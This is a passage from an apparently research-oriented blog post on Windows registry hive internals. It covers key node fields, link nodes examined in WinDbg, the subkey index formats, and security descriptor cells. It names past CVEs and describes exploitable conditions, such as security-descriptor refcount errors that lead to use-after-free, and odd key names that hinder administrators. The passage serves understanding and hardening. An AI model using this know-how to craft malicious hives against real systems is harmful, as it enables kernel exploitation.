indeed be considered as four extra bits of user-controlled storage per key, accessible for reading via NtQueryKey(KeyFlagsInformation) and for writing via NtSetInformationKey(KeyWow64FlagsInformation). Beyond being interesting for historical reasons, the field doesn't play any important role in security.VirtControlFlags This field is another one introduced around Windows XP SP3 / Windows Vista that took over some of the space from MaxNameLen. It is related to Registry Virtualization and takes up four bits in the _CM_KEY_NODE structure definition, but there are only three flags that it can really store: Mask Name Description 0x1 REG_KEY_DONT_VIRTUALIZE Disables virtualization for the specific key. 0x2 REG_KEY_DONT_SILENT_FAIL Prevents the system from re-opening a virtualized key with MAXIMUM_ACCESS if the initial Open operation with the desired access rights has failed. 0x4 REG_KEY_RECURSE_FLAG Causes new subkeys of the key to inherit its virtualization-related configuration. The flags are not sanitized in any way during hive load and so may be set to arbitrary values. They can also be modified programmatically by using the NtSetInformationKey(KeyControlFlagsInformation) system call, or even from the Windows command line, by using the REG FLAGS command: C:\>reg flags /? REG FLAGS KeyName [QUERY |                    SET [DONT_VIRTUALIZE] [DONT_SILENT_FAIL] [RECURSE_FLAG]]                   [/reg:32 | /reg:64]   Keyname    "HKLM\Software"[\SubKey] (Restricted to these keys on         local machine only).     SubKey   The full name of a registry key under HKLM\Software.   DONT_VIRTUALIZE DONT_SILENT_FAIL RECURSE_FLAG     Used with SET; flags specified on the command line will be set,         while those not specified will be cleared.   /reg:32  Specifies the key should be accessed using the 32-bit registry view.   /reg:64  Specifies the key should be accessed using the 64-bit registry view. More information about these flags can be found in the documentation of the ORSetVirtualFlags API function, a part of the Offline Registry Library. In the context of registry security research, I haven't found them particularly interesting – the other virtualization-related flags in the "Flags" field have proved to be much more useful in that regard.Debug In Debug/Checked builds of Windows, it used to be possible to have the kernel trigger a breakpoint when performing a specific operation on a specific registry key. To enable the option, an administrator would have to set the  HKLM\System\CurrentControlSet\Control\Session Manager\Configuration Manager\RegDebugBreaksEnabled value to 1, which would propagate to the global kernel CmpRegDebugBreakEnabled variable. Then, the "Debug" field of each key would store a bitmask indicating which subset of eight possible operations should be interrupted for the given key: Mask Name 0x01 BREAK_ON_OPEN 0x02 BREAK_ON_DELETE 0x04 BREAK_ON_SECURITY_CHANGE 0x08 BREAK_ON_CREATE_SUBKEY 0x10 BREAK_ON_DELETE_SUBKEY 0x20 BREAK_ON_SET_VALUE 0x40 BREAK_ON_DELETE_VALUE 0x80 BREAK_ON_KEY_VIRTUALIZE Whenever a breakpoint was triggered by this mechanism, the kernel would also print out a corresponding message for the attached debugger, for instance: DbgPrint("\n\n Current process is deleting a key tagged as BREAK ON DELETE"); DbgPrint(" or deleting a subkey under a key tagged as BREAK_ON_DELETE_SUBKEY\n"); DbgPrint("\nPlease type the following in the debugger window: !reg kcb %p\n\n\n", Kcb); Now that the Debug/Checked builds have been discontinued – or at least not released publicly anymore for the latest versions of Windows 10/11 – the "Debug" field is just an unused byte in the key node structure.WorkVar According to an unofficial format specification, WorkVar used to be an internal-use member meant to be only ever accessed by the kernel in order to optimize key lookups. The last version of Windows where WorkVar was still in active use was Windows 2000; since Windows XP, it has simply been another four bytes of unused memory in the key node data layout.NameLength and Name The combination of these two fields specifies the name of the key: NameLength indicates the length of the string in bytes, and Name is an inline, variable-length buffer at the end of the structure that stores the name itself. There are a number of considerations and consistency requirements related to registry key names, enforced when loading a hive and later at runtime: Compression: If the KEY_COMP_NAME (0x20) flag is clear in _CM_KEY_NODE.Flags, the name is formatted as a wide string of 16-bit characters. If it is set, which is the common scenario, then "Name" represents a more tightly packed ASCII string of 8-bit characters. Considering that a majority of keys in the registry are alphanumeric, this optimization saves a non-trivial amount of memory and disk space. It is interesting to note that it is still possible to load a hive with a non-optimally formatted key name (non-compressed ASCII string), but such a key node would never be generated by Windows itself.Length: The key name mustn't be empty (i.e. it should be at least one character long), and it cannot exceed 256 characters in length (even though Registry element size limits incorrectly claims that the limit is 255). The NameLength field value is expressed in bytes, so it must be between 1-256 for compressed names, and 2-512 for wide strings (and divisible by two). Up until October 2022, this limit was not correctly enforced, making it possible to load hives with key names up to 1040 characters, which would then be mishandled or outright rejected by other parts of the registry code.Charset: All characters in the 0x0000 – 0xFFFF range are allowed in a key name with the exception of backslash ('\', 0x005C). The backslash is singled out because it plays a special role in the registry, separating distinct elements of the registry paths. Since the kernel must always be able to distinguish parts of key names from the separator, a decision was made to exclude this one character from the key name charset, similar to how backslashes are not allowed in file names. Furthermore, there is a second minor requirement that the key name must not start with a null character, but it may be present at any other position in the name (this only started to be properly enforced in NtRenameKey after the fix for CVE-2024-26178 in March 2024). Overall, this means that key names aren't truly textual strings in the conventional sense of the word: they don't use a terminator, and may contain all sorts of non-printable characters. It would be more appropriate to think of them as binary blobs used to reference registry keys, which doesn't have any consequences for the kernel, as it universally uses the UNICODE_STRING structure that includes both the length and the backing buffer of the string anyway. But if a potentially malicious program were to create a key with an unusual name (e.g. including a null character), it could prove difficult for an administrator to operate on it with the built-in registry utilities (reg.exe, Regedit), or even with third-party tools that use the high-level API (such as RegOpenKeyEx). In such cases, it might be required to use specialized tools that interact with the Windows registry directly through the system call interface as the only way to examine/modify such keys.Uniqueness: One of the most important invariants of the Windows registry implementation is the uniqueness of key names: there may be only one key with a specific path, or in other words, for every key, there mustn't be any duplicates in the list of its subkeys. Given that registry key names are case-insensitive, any two names are always compared in their uppercase form to determine if they are equal or not. This uniqueness requirement is enforced both during hive load and subsequent operations, and failure to do it correctly could lead to both logic bugs and memory corruption. For some examples of the potential outcomes of allowing duplicate key names in registry, see Maxim Suhanov's The uppercased hell blog or my CVE-2023-21748 / CVE-2023-23420 bug reports. Another intriguing aspect of the key names are the names associated with the root keys of default system hives. In general, every registry key in Windows is referenced by its name specified in the key node, except for root keys, which are known by the name of their mount points. As a result, the "real" underlying names of root keys are never visible to users or applications, but they are nevertheless present in the hive file as a mandatory part of every key node, and could be potentially used to learn something about how these fundamental system hives (SOFTWARE, SYSTEM etc.) are generated. I have examined hives from various Windows versions ranging from Windows NT 3.1 to Windows 11, and arrived at the following list of per-version root key names: Version Root key name NT 3.1 - NT 4.0 Same as the hive name (e.g., "SYSTEM") 2000 - XP $$$PROTO.HIV Vista - 7 CMI-CreateHive{RANDOM GUID} 8 CsiTool-CreateHive-{00000000-0000-0000-0000-000000000000} 10 - 11 ROOT In early NT versions, the root key name simply mirrored the hive's file name. In Windows 2000 and XP, the name stemmed from the fact that system hives were created during system installation by temporarily creating the tree root under \Registry\Machine\SYSTEM\$$$PROTO.HIV, pre-initializing it with the default data for the given hive, and saving it to a file with an API like RegSaveKeyEx. In Windows 10 and 11, the name is simply "ROOT", which, along with the "OfRg" magic bytes at offset 0xB0 in the file header, hints that the hives are created with the Offline Registry Library. This leaves versions between Windows Vista and Windows 8 as the big unknown: neither "CMI-CreateHive" nor "CsiTool-CreateHive" sound particularly familiar, and I haven't been able to find any information about them in any public resources. It is probably safe to assume that these strings are indicative of some internal Microsoft tooling that was used to generate hives for these systems, but not much is known beyond it. Nevertheless, I find it fascinating that such little tidbits of information can be found in obscure corners of file formats. You never know when some other missing part of the puzzle becomes known publicly, making it possible to finally connect the dots and see the bigger picture, sometimes years or decades after the initial release of the software.Link nodes As mentioned above, link nodes are a special type of key node designed to facilitate the mounting of arbitrary hives from disk into the global registry view. They are managed by the Windows kernel and only ever exist in memory. They are represented by the _CM_KEY_NODE structure, but with the following differences compared to regular keys: The Signature field is set to 0x6B6C ('lk') instead of 0x6B6E ('nk'),The KEY_HIVE_EXIT (0x0002) flag is set in Flags,The key doesn't have any of the standard key properties, such as the security descriptor, class, subkeys or values. The only cell reference it contains is to its parent cell, which is one of \Registry\A, \Registry\Machine, \Registry\User or \Registry\WC.Instead of the SubKeyLists member at offset 0x1C, the link node uses the ChildHiveReference field of type _CM_KEY_REFERENCE, which stores a kernel-mode pointer to the destination hive descriptor (_HHIVE*), and the cell index of the root key within that hive. So, whenever you see a hive root key (e.g. any key within HKLM or HKCU), you are actually looking at a pair of a link node (also known as exit node) + root key (a.k.a. entry node – these terms are used interchangeably). The mount point assumes the key name of the link node (so that it is easily enumerable with the existing kernel logic), and all of the characteristics of the entry node. This is illustrated in the following diagram, where the key marked in red is the link node of the SYSTEM hive, and the green one is the root key: The existence of link nodes seems to be very little known and scarcely documented in public resources, which is likely caused by the fact that the Windows kernel makes them virtually invisible, and not just for users and high-level API clients, but even for administrators and kernel driver developers. The way the registry tree traversing code is structured, whenever it encounters a link node, it always makes sure to skip over it and reference the corresponding entry node. This means that it is impossible to open or otherwise observe the link node itself from the context of user-mode, but if we put in some effort, we should be able to see it in WinDbg attached as a kernel debugger. We can approach the link node from two sides: either try to find it top-down starting from the master hive, or by locating a key in a mounted hive and traversing the registry tree upwards. In this post, we will proceed with the first idea and enumerate the keys within \Registry\Machine (i.e. HKLM): 0: kd> !reg querykey \registry\machine Found KCB = ffff800f88ad96e0 :: \REGISTRY\MACHINE Hive         ffff800f88a88000 KeyNode      ffff800f88ada16c [SubKeyAddr]         [SubKeyName] ffff800f88ada44c     BCD00000000 ffff800f88ada3cc     HARDWARE ffff800f88ada59c     SAM ffff800f88ada504     SECURITY ffff800f88ada374     SOFTWARE ffff800f88ada31c     SYSTEM  Use '!reg keyinfo ffff800f88a88000 ' to dump the subkey details [ValueType]         [ValueName]                   [ValueData] REG_DWORD           ServiceLastKnownStatus        2 Here, we can see all the system hive mount points together with their corresponding link node addresses. In case of normal, stable keys, these would be user-mode addresses within the address space of the Registry process, but since the master hive is a volatile one, all of its structures are stored on the kernel pools. We can then use a command such as !reg knode to query any of the specific subkeys, e.g. SYSTEM: 0: kd> !reg knode ffff800f88ada31c Signature: CM_LINK_NODE_SIGNATURE (kl) Name                 : SYSTEM ParentCell           : 0x168 Security             : 0xffffffff [cell index] Class                : 0xffffffff [cell index] Flags                : 0x2a MaxNameLen           : 0x0 MaxClassLen          : 0x0 MaxValueNameLen      : 0x0 MaxValueDataLen      : 0x0 LastWriteTime        : 0x 1db2b94:0xe031a530 SubKeyCount[Stable  ]: 0x0 SubKeyLists[Stable  ]: 0x20 SubKeyCount[Volatile]: 0x0 SubKeyLists[Volatile]: 0xffffffff ValueList.Count      : 0x88a8e000 ValueList.List       : 0xffff800f As expected, the key node has the special link node signature ('kl'), and the 0x2 flag set within the 0x2a Flags bitmask (the other two flags set are KEY_NO_DELETE and KEY_COMP_NAME). The command gets a little confused, because it expects to operate on a regular key node and display its subkey/value counts and lists, but as mentioned above, this space is taken up by the _CM_KEY_REFERENCE structure in the link node. If we line up the offsets correctly, we can decode that the exit node points at cell index 0x20 in hive 0xffff800f88a8e000, which is consistent with the outcome of displaying the structure data directly: 0: kd> dx -id 0,0,ffffbd044acf6040 -r1 (*((ntkrnlmp!_CM_KEY_REFERENCE *)0xffff800f88ada338)) (*((ntkrnlmp!_CM_KEY_REFERENCE *)0xffff800f88ada338))                 [Type: _CM_KEY_REFERENCE]     [+0x000] KeyCell          : 0x20 [Type: unsigned long]     [+0x008] KeyHive          : 0xffff800f88a8e000 [Type: _HHIVE *] We can now translate this information into the cell's virtual address, and take a peek into it with !reg knode and !reg keyinfo: 0: kd> !reg cellindex 0xffff800f88a8e000 0x20 Map = ffff800f88adc000 Type = 0 Table = 0 Block = 0 Offset = 20 MapTable     = ffff800f88ade000  MapEntry     = ffff800f88ade000  BinAddress = ffff800f896e8009, BlockOffset = 0000000000000000 BlockAddress = ffff800f896e8000  pcell:  ffff800f896e8024 0: kd> !reg knode ffff800f896e8024 Signature: CM_KEY_NODE_SIGNATURE (kn) Name                 : ROOT ParentCell           : 0x318 Security             : 0x78 [cell index] Class                : 0xffffffff [cell index] Flags                : 0x2c MaxNameLen           : 0x26 MaxClassLen          : 0x0 MaxValueNameLen      : 0x0 MaxValueDataLen      : 0x0 LastWriteTime        : 0x 1db2b94:0xe031a530 0: kd> !reg keyinfo 0xffff800f88a8e000 ffff800f896e8024 KeyPath         \REGISTRY\MACHINE\SYSTEM [SubKeyAddr]         [SubKeyName] ffff800f896e8174     ActivationBroker ffff800f896e964c     ControlSet001 ffff800f89f0e8a4     DriverDatabase ffff800f89f999c4     HardwareConfig ffff800f89f9a314     Input ffff800f89f9a3dc     Keyboard Layout ffff800f89f9a43c     Maps ffff800f89f9a674     MountedDevices ffff800f89f9ab64     ResourceManager ffff800f89f9abc4     ResourcePolicyStore ffff800f89f9ac2c     RNG ffff800f89f9addc     Select ffff800f89f9aed4     Setup ffff800f89f9b7d4     Software ffff800f89f9d1f4     State ffff800f89f9d24c     WaaS ffff800f89fabc8c     WPA [SubKeyAddr]         [VolatileSubKeyName] ffff800f88b91024     CurrentControlSet  Use '!reg keyinfo ffff800f88a8e000 ' to dump the subkey details [ValueType]         [ValueName]                   [ValueData]  Key has no Values We have indeed ended up at the root key of the SYSTEM hive, which has a standard key node signature ('nk'), the predefined "ROOT" name, a valid security descriptor, a list of subkeys, and so on. Overall, link nodes are an interesting implementation detail of the registry that are worth keeping in mind. However, considering their relative simplicity and the fact that they are hidden away even from very low-level mechanisms like Registry Callbacks, they are of limited significance to system security. The lone vulnerability I found related to them, CVE-2023-21747, resulted in a use-after-free due to improper cleanup of the exit node when faced with an out-of-memory condition.Subkey indexes Operations performed on subkey lists are some of the most common ones – they are involved whenever a key is opened, created, deleted, renamed or enumerated, which constitutes a majority of actions involving the registry at runtime. It is for this reason that subkey lists have seen the most evolution throughout the subsequent versions of the regf format. As the interface was getting adopted by more and more applications in Windows NT and later systems, Microsoft developers could collect data on the typical usage patterns and devise adequate optimizations to speed these operations up. In this section, we will have a deeper look into how subkey indexes are formatted in the hives, and how the different types of operations affect them. By way of introduction, subkey indexes are data structures storing lists of descendant keys relative to a parent key, referenced through the _CM_KEY_NODE.SubKeyLists[...] cell indexes. During hive load, the value at index 0 of the array may either be a subkey index, or HCELL_NIL if there are no subkeys; index 1 must always be equal to HCELL_NIL, as by definition there are no volatile subkeys on disk. The high-level concept behind the subkey index is that it is a linear list of key node cell indexes, which must efficiently support the following operations (from most to least commonly used, in my subjective opinion): Finding a key by name,Finding a key by index on the list,Adding a new key to the list,Deleting a key from the list. Regardless of the underlying representation of the list, it is always stored in a lexicographical order, reducing the lookup-by-name time from linear to logarithmic by using binary search. Let's now look into the specific structures used in registry hives to implement this functionality.Index leaves Index leaves are the most basic type of a subkey list, which has been supported since the first iteration of the regf format and consists of just three members: the signature (0x696C, 'li'), number of entries (16-bit), and an inline, variable-length list of the cell indexes. The corresponding Windows kernel structure is _CM_KEY_INDEX: 0: kd> dt _CM_KEY_INDEX nt!_CM_KEY_INDEX    +0x000 Signature        : Uint2B    +0x002 Count            : Uint2B    +0x004 List             : [1] Uint4B Given the Count field range, the index leaf can store up to 65535 subkeys. It is the most compact one in terms of disk/memory consumption, but it provides somewhat poor cache locality, because every key referenced during the lookup must be accessed in memory in order to read its name from _CM_KEY_NODE.Name. Nevertheless, index leaves are still commonly used in all versions of Windows up to this day. As an example, let's consider a key with five subkeys named "wombat", "🐂", "HIPPO", "ant", and "ocelot". An index leaf of such a key could look like this: This illustrates that entries in the list are indeed stored in a sorted manner, and in a case-insensitive way – "ant" goes before "HIPPO" even though 'H' (0x48) < 'a' (0x61). However, this logic applies to comparisons only, and otherwise the letter casing specified during key creation is preserved and visible to registry users. Finally, the unicode ox symbol is placed last on the list, because it is encoded as U+D83D U+DC02, and 0xD83D is greater than any of the ASCII characters in the other names.Fast leaves Fast leaves are slightly younger than subkey indexes, introduced in regf version 1.3 in 1995 (Windows NT 4.0). As hive versions 1.2 and below have been long obsolete, that means that fast leaves are universally supported in every modern version of Windows at the time of this writing. As the name suggests, they are meant to be faster than their predecessors, by including up to four initial characters of each subkey in the list as a "hint" next to the cell index of the key. This allows the kernel to execute the first four iterations of the string comparison loop using data only from the fast leaf and without referring to the corresponding node, which addresses the aforementioned issue of poor cache locality in index leaves. We expect this optimization to be effective in most real-life scenarios, as most keys consist of ASCII-only characters and differ from each other within the first four symbols. The specific logic of generating the 32-bit hint from a string can be found in the internal CmpGenerateFastLeafHintForUnicodeString kernel function, but is boils down to the following steps: Set the initial hint variable to 0In a loop of min(4, length) iterations:If the n-th character is greater than 0xFF, breakOtherwise add the character (with its original case) to the hintReturn the hint to the caller For example, the hint for "ant" is "ant\0", the hint for "HIPPO" is "HIPP", and the hint for "🐂" is "\0\0\0\0" (the first character is non-ASCII, so the whole hint is simply zero). When it comes to the structure layout of the fast leaf, it is basically the same as the index leaf, but it has a different signature ('lf') and twice as many entries in the List array due to the addition of hints. There doesn't seem to be any structure definition corresponding specifically to fast leaves in the public symbols, which either means that the structure is a non-public one, or it is also accessed via _CM_KEY_INDEX in the source code, but through references such as Index.List[2*n] instead of Index.List[n]. An illustration of a fast leaf containing the five example subkeys is shown below: Hash leaves Hash leaves are the third and last (for now) iteration of the subkey index format, introduced in Windows XP in 2001 (regf version 1.5). They have exactly the same data layout as fast leaves, but are characterized by the 'lh' signature, and the 32-bit hint is a simple hash of the entire string instead of an inline representation of the first four characters. The specific hashing algorithm is implemented in the internal CmpHashUnicodeComponent function, and can be summarized with the following steps: Start with a hash equal to 0For every character in the string:Hash = (Uppercase(Character) + 37 * Hash) % 0x100000000Return the hash to the caller The main benefit of this approach is that it works equally well with ASCII and non-ASCII strings, and it covers the entire name and not just a prefix, further limiting the number of necessary references to the subkey nodes during key lookup. However, you may notice that a full-string hash isn't really compatible with the concept of binary search, and indeed, whenever a hash leaf is used, the kernel performs a linear search instead of a binary one, as can be seen in the corresponding CmpFindSubKeyByHashWithStatus function. In theory, this could lead to iterating through 65535 keys (the maximum number of entries in a hash leaf), but in practice, the kernel makes sure that a hash leaf is never longer than 1012 elements. This is okay for performance, because when more subkeys are associated with a key, a second-level data structure comes into play (the root index, see the next section), and that one is always traversed with a binary search. Overall, it seems possible that the cache friendliness of the hash leaf makes up for its theoretically worse lookup complexity, especially in the average case. A corresponding diagram of a hash leaf data layout is shown below: Root indexes Each key in the registry can potentially have many thousands of subkeys, but having them stored in one very long list (such as a single index, fast or hash leaf) could lead to poor performance for some operations. For example, whenever a new key is inserted into the alphabetically sorted list, the portion of the list after the new key has to be moved in memory to make room for the new item. Similar CPU-heavy situations could arise when extending the dynamically sized array in the hive, and potentially having to copy its entire contents to a new cell if the existing one doesn't have any free space behind it. In the worst case scenario, this would have a complexity of O(n) per operation, which is too slow for such an important system mechanism as the Windows registry. It is likely for this reason that whenever the subkey list becomes longer than 1012 elements for the first time, a second-level index called the root index is inserted into the data structure. This has the goal of splitting a single long list into several shorter ones, which are easier to manage in memory. Root indexes cannot be nested or referenced recursively by one another: a subkey list may either be non-existent, a single leaf-type list, or a single root index pointing at leaf-type lists (in other words, the list may be 0, 1 or 2 levels deep). The root index has existed for as long as the index leaves have: since the very first regf version 1.0 in Windows NT 3.1 Pre-Release. It also has the same layout represented by the _CM_KEY_INDEX structure, which consists of a signature ('ri' in this case), a 16-bit count and an array of cell indexes pointing at leaf-type lists, without any additional hints. An example diagram of a two-level subkey index containing five keys is shown below: Fundamental subkey list consistency requirements There is a set of some very basic format consistency requirements concerning subkey indexes, which must be always met for any active hive in the system, regardless of whether it has been loaded from disk or created from scratch at runtime. These are the minimum set of rules for this data structure to be considered as "valid", and they are tightly connected to the memory safety guarantees of the kernel functions that operate on them. They are as follows: The signature of each subkey list cell must be correctly set to its corresponding type, one of 'li', 'lf', 'lh' or 'ri'.The size of the cell must be greater or equal to the number of bytes required to store all of the elements in the "List" array, according to the value of the "Count" member.A subkey list cell may never be empty, i.e. _CM_KEY_INDEX.Count mustn't be zero (whenever it becomes zero, it should be freed and un-referenced in any of the other hive cells).The number of subkeys cached in the key node (_CM_KEY_NODE.SubKeyCounts[x]) must be equal to the number of subkeys defined in the subkey index (i.e. the sum of _CM_KEY_INDEX.Count of its index leaves).The cell indexes stored in _CM_KEY_NODE.SubKeyLists[x] must either be HCELL_NIL (if SubKeyCounts[x] is zero), or point to a root index or one of the three leaf types. Additionally, SubKeyCounts[1] must be zero and SubKeyLists[1] must be HCELL_NIL on hive load.All cell indexes stored in a root index must point at valid leaf indexes.All cell indexes stored in leaf indexes must point at valid key nodes.All hints specified in the fast leaves and hash leaves must be consistent with the names of their corresponding keys.The overall subkey list must be sorted lexicographically, i.e. the name of each n+1th subkey must be strictly greater than the name of the nth subkey. This also entails that there mustn't be any duplicates in the subkey list, neither with regards to the cell index or the subkey name. Notably, there are also some constraints that seem very natural, but are in fact not enforced by the Windows kernel: There is no requirement that the format of a leaf-type index must be consistent with the version of the hive: instead, every one of li/lf/lh types are accepted for every hive version 1.3 – 1.6. The most glaring example of this behavior is that hash leaves are allowed in hive versions 1.3 and 1.4, even though they were historically only introduced in version 1.5 of the format.There is no requirement that all the leaf indexes referenced by a root index are all of the same type. In fact, a single subkey list may consist of an arbitrary combination of index leaves, fast leaves and hash leaves, and the kernel must handle such situations gracefully.Beyond the fact that none of the actively used subkey indexes may be empty, there are no limitations with regards to how the subkeys are laid out in the data structure. For example, the existence of a root index doesn't automatically indicate that there are many subkeys on the list: there may as well be a single root index, pointing to a single leaf, containing a single subkey. It is also allowed for several leafs being part of a single root index to have wildly different counts, with some single-digit ones coexisting with others around the 64K mark. The kernel doesn't ensure any advanced "balancing" of the subkey index by default – it does split large leafs into smaller ones, but only while adding a new subkey, and not during the loading of an existing hive. Three examples of kernel vulnerabilities that were directly related to the handling of subkey lists are: CVE-2022-37956 (integer overflows in registry subkey lists leading to memory corruption), CVE-2022-38037 (memory corruption due to type confusion of subkey index leaves in registry hives) and CVE-2024-26182 (subkey list use-after-free due to mishandling of partial success in CmpAddSubKeyEx). I personally find the first one (CVE-2022-37956) particularly interesting, because the hive memory corruption could be triggered with the right sequence of API calls, or even just command-line reg.exe tool invocations. Granted that the number of required operations was quite high (around 66 million), but it still goes to show that being intimately familiar with the inner workings of the target software may open new avenues of exploitation that would otherwise not be available. For a detailed explanation of the subkey list management logic, see the next section.Internal Windows logic of handling subkey lists On top of the requirements and restrictions imposed by the regf format itself, there are some further characteristics of most registry hives found on real systems, caused by some decisions implemented in the logic of the Windows kernel. The most important thing to note is that, as mentioned above, the kernel operates on any subkey list lazily, only when there is a need to do so due to a key being added/deleted in the registry. Therefore, a weirdly formatted (but adhering to the bare regf requirements) subkey index will remain in this state after loading, for as long as a client application doesn't decide to change it. Most of the relevant high-level logic of handling subkey lists takes place when adding new keys, and is illustrated in the flow chart below: The general high-level function that implements the above logic in the Windows kernel is CmpAddSubKeyEx, which then calls a few helper routines with mostly self-descriptive names: CmpAddSubKeyToList, CmpSelectLeaf, CmpSplitLeaf and CmpAddToLeaf. Compared to addition, the process of deleting a key from the list is very straightforward, and is achieved by removing it from the respective leaf index, freeing the leaf if it was the last remaining element, and freeing the root index if it was present and the freed leaf was its last remaining element. There are no special steps being taken other than the strictly necessary ones to implement the functionality. Given the above, we can conclude that registry hives created organically by Windows generally adhere to the following set of extra rules:The leaf types being used are in line with the version of the hive: index and fast leaves for versions ≤1.4, and hash leaves for versions ≥1.5.All leaves within a single index root have the same type.Index leaves never contain more than 1012 elements.Once a root index is created for a key, it is never downgraded back to a single leaf index other than through the deletion of all subkeys, and creating a new one starting from an empty subkey list.Security descriptors Security descriptors play a central role in enforcing access control to the information stored in the registry. Their significance is apparent through the fact that they are the only mandatory property of registry keys, as opposed to classes, values and subkeys which are all optional. At the same time, large groups of keys typically share the same security settings, so it would make little sense to store a separate copy of the data for every one of them. For example, in a default installation of Windows 11, the SOFTWARE hive includes around 250,000 keys but only around 500 unique security descriptors. This is why they are the only type of cell in the hive that can be associated with multiple keys at the same time. By only storing a single instance of each unique descriptor in the hive, the system saves significant disk and memory space. However, this efficiency requires careful management of each descriptor's usage through reference counting, which ensures they can be safely freed when no longer needed. When loading a hive, the kernel enumerates all of its security descriptors without having to traverse the entire key tree first. In order to make this possible, security descriptors in the stable space are organized into a doubly-linked list, starting at the descriptor of the root key. Internal consistency of this list is mandatory – if any inconsistencies are found, it is reset to become a single-entry list with just the root security descriptor and nothing else. If the root security descriptor itself is corrupted, the hive is deemed to be in an unrecoverable state and rejected completely. While traversing the global list, the kernel also verifies that the binary encoding of the security descriptors is valid and safe to pass to internal security-related functions later in time. In the hives, descriptors are formatted as self-contained blobs of bytes adhering to the SECURITY_DESCRIPTOR_RELATIVE structure layout. Compared to other hive cells (key nodes etc.), the internal format of security cells is relatively complex: it is variable in size and contains multiple sub-structures (SIDs, ACLs, ACEs), length indicators and internal offsets. To detect any potential corruption early, the RtlValidRelativeSecurityDescriptor function must succeed for every descriptor in a newly loaded hive, otherwise the previously discussed fallback logic takes place. The last step in the security descriptor validation process is to make sure that the reference counts specified in the hive are equal to the actual number of references from registry keys. This is achieved by re-counting the references when traversing the key tree structure of the hive, and later checking if the values found in _CM_KEY_SECURITY.ReferenceCount are in line with the regenerated counts. If the two values are unequal, the refcount in the security cell is adjusted to reflect the correct number of references. This is critical for system security, because operating on an invalid refcount – especially an inadequately small one – may directly lead to exploitable memory corruption conditions. Some examples of historical vulnerabilities related to the three fundamental aspects of security descriptor consistency are as follows:Linked list consistency: CVE-2022-34708, CVE-2024-26178Security descriptor binary format validity: CVE-2022-35768Reference counting: CVE-2022-34707, CVE-2023-28248, CVE-2023-35356, CVE-2023-35382, CVE-2023-38139 A high-level illustration of a security descriptor linked list consisting of three elements is shown in the diagram below: Security cell format Let's now have a look at the specific layout of the security cells. They are represented by the _CM_KEY_SECURITY structure, whose definition is shown in the WinDbg format below: 0: kd> dt _CM_KEY_SECURITY nt!_CM_KEY_SECURITY    +0x000 Signature        : Uint2B    +0x002 Reserved         : Uint2B    +0x004 Flink            : Uint4B    +0x008 Blink            : Uint4B    +0x00c ReferenceCount   : Uint4B    +0x010 DescriptorLength : Uint4B    +0x014 Descriptor       : _SECURITY_DESCRIPTOR_RELATIVE Each of its fields is discussed in more detail in the following subsections.Signature The magic bytes of this cell type, equal to 0x6B73 ('sk'). It exists for informational purposes only, but isn't used for anything at runtime – it isn't even verified on hive load, and can therefore be anything in a binary-controlled hive.Reserved An unused field that may contain arbitrary data; never accessed by the kernel.Flink and Blink As discussed earlier, these are the forward and backward links in the security descriptor list. They must always be kept in a valid state. In a single-element list, Flink/Blink point at themselves – that is, at the security descriptor they are both part of.ReferenceCount This single field was arguably responsible for the most registry-related vulnerabilities out of all of the hive structures. It is a 32-bit unsigned integer that expresses the number of objects that actively rely on this security descriptor, which mostly means the key nodes associated with it, but not only. Whenever this member gets out of sync with the real number of references, it may lead to serious memory corruption primitives, so it is very important that the kernel ensures its correct value both on hive load and during any subsequent operations. The two prevalent risks are that: The refcount gets too small: when this happens, it is possible that the cell gets freed while some objects still hold active references to it. This leads to a straightforward use-after-free scenario, and in my experience, it is easily exploitable by a local attacker.The refcount gets too large: this situation doesn't immediately lead to memory corruption, but let's remember that the structure member has a limited, 32-bit width. If an attacker were able to indiscriminately increment the counter without real references to back it up, they could eventually get it to the maximum uint32 value, 0xFFFFFFFF. For many years, the Windows kernel hasn't implemented any protection against registry refcount integer overflows, so another incrementation of the field after 0xFFFFFFFF would wrap it back to zero, which brings us to the previous scenario of an inadequately small count. However, following some bug reports and discussions, Microsoft has gradually added overflow protection in the relevant, internal functions, starting in April 2023 and eventually landing the last missing check in November 2024. Thanks to this effort, I believe that as I am writing this, security descriptor refcount leaks should no longer be an exploitable condition. Under most circumstances, the value of the refcount is somewhere between 1 and ~24.4 million (the maximum number of keys in a hive given the space constraints). However, it is interesting to note that it might be legitimately set to a greater value. Consider the following: immediately after loading a hive, all security refcounts are exactly equal to the number of keys associated with them. But, key nodes globally visible in the registry tree are not the only ones that can reference security cells; there may be also keys that have been created in the scope of a transaction and not committed yet, as well as pending, transacted operations of changing the security properties of a key (marked by the UoWAddThisKey and UoWSetSecurityDescriptor enums of type UoWActionType). They too may increase the refcount value beyond what would normally be possible with just regular, non-transacted keys. This phenomenon has been discussed in detail in the CVE-2024-43641 bug report. Overall, reference counts are of great importance to system security, and every registry operation that involves it deserves a thorough security assessment.DescriptorLength This is the length of the security descriptor data (i.e. the size of the Descriptor array) expressed in bytes. It's worth noting that the format doesn't force it to be the minimum length sufficient to store the binary blob. This means that the overall cell length must be greater than DescriptorLength + 20 (i.e. the declared length of the descriptor plus the _CM_KEY_SECURITY header), and in turn DescriptorLength must be greater than the actual size of the descriptor. Both cases of the cell size or the DescriptorLength having non-optimal values are accepted by the kernel, and the extra bytes are ignored.Descriptor This variable-length array stores the actual security descriptor in the form of the SECURITY_DESCRIPTOR_RELATIVE structure. It doesn't necessarily have to be formatted in the most natural way, and the only requirement is that it successfully passes the RtlValidRelativeSecurityDescriptor check with the RequiredInformation argument set to zero. This means, for example, that the Owner/Group/Sacl/Dacl components may be spread out in memory and have gaps in between them, or conversely, that their representations may overlap. This was one of the main contributing factors in CVE-2022-35768, but the fix was to more accurately calculate the length of irregularly-encoded descriptors, and the freedom to structure them in non-standard ways has remained. It is even possible to use a completely empty descriptor without any owner or access control entries, and such a construct will be acknowledged by the system, too. Another somewhat interesting fact is that security descriptors are meant to be deduplicated, so naturally whenever a user assigns a security descriptor that already exists in the hive, it is simply reused and its reference count is incremented. However, again, the format (or rather its canonical implementation in Windows) doesn't force the uniqueness requirement upon the security descriptors in hives loaded from disk. So, even though they would be never created by the OS itself, multiple identical copies of a descriptor are allowed in specially crafted hives and may co-exist without (seemingly) causing any issues for the kernel. The access rights defined by the security descriptors are based on permissions specific to the registry and its operations, so there is an access mask dedicated to creating keys (KEY_CREATE_SUB_KEY), reading values (KEY_QUERY_VALUE), writing values (KEY_SET_VALUE), and so on. They all have self-descriptive names and are well-documented in Registry Key Security and Access Rights, so we won't spend more time discussing them here.Security descriptors of volatile keys Similarly to every other property of a registry key, the storage type of a security descriptor always matches the type of its associated key(s). This means that a stable key will always use a stable descriptor, and a volatile 